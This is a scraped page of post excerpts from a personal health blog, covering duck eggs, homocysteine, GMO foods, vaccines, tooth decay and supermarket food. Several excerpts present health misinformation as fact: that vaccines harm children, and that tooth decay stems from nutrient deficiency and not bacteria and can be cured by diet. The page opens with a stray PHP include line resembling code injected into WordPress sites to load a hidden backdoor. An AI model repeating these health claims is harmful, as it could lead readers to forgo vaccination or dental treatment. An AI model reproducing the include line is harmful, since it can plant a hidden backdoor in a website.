@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 184 of 235

Author: Good Samaritan

I found the raw balut wholesaler in the market

Commuting and walking around in the city market paid off again.  This time I discover the balut wholesaler stalls.  Balut is developed duck egg.  Usually sold 17 days old in incubation.  Duck eggs usually hatch in 21 days.  So the wholesaler of the balut sell the eggs just in...

The Homocysteine Factor: a measurable lab result tool for health

I just finished reading a book called The H Factor.  The authors Holford and Braly push their new found tool to measure health, called Homocysteine. On the cover it says: “Homocysteine is the new cholesterol.  It’s potentially your most important health statistic.” “The fast new way to dramatically improve...

The Future of Food: What Every Person Should Know

Learn the real issues behind the rejection of GMO foods for health, laws, economics, bio diversity. If you are interested in your health, your children’s future, your country’s future, the world’s future, this is for you. The following is an educational presentation interviewing the film maker Deborah Garcia. Filipino...

Rami Nagel: Vaccines Exposed – A Hidden Crime Against Our Children

Rami Nagel has a hard hitting monologue about vaccines being harmful, not helpful to our children. My wife and I knew that almost for 4 years now. That is why our youngest child is vaccination free. Drug free. Plus she is the healthiest child we have. Proves we are...

Movie Review: All Jacked Up, U.S. Teens eat a junk food lifestyle

I just watched All Jacked Up last night.  It’s a movie made by teens for teens.  Four average American teenagers are profiled.  The host teenager interviews a couple of experts and asks their opinions. The movie reminded me about how clueless I was myself when I was a teenager. ...

Cure Tooth Decay!

It is store food that has given us store teeth. The primary cause of tooth decay is NOT BACTERIA, but a deficiency in nutrients. Heal And Prevent Cavities With Nutrition. Rami Nagel Teaches how to cure tooth decay part 1 of 3 Rami Nagel Teaches how to cure tooth...

Supermarket sells mostly junk products… scary

I went to a supermarket today.  I was looking for raisins with seeds in them.  David Wolfe said they were good.  I also needed some extra virgin olive oil, we ran out.  Aside from those two products I bought this afternoon, I thought the supermarket had nothing really to...